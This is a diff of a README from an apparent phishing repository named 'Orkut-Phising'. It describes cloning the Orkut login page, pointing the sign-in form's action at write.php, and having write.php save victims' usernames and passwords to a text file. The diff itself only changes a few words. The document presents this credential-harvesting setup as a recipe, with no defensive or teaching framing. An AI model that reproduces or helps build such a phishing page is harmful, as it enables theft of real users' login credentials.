razaarifsyed/Orkut-Phising/README.md

 2. Write.php

 index.htm was made by first copying the source code of the Orkut login page.
-Then modifying it by adding this in line 128 to signin button action.  action=write.php id="https://www.google.com/accounts/ServiceLoginAuth?service=orkut"
+Then modifying it by adding this in the line 128 to signin button action. action=write.php id="https://www.google.com/accounts/ServiceLoginAuth?service=orkut"

 Write.php creates a passes.text file.
 And then writes the username and password to it.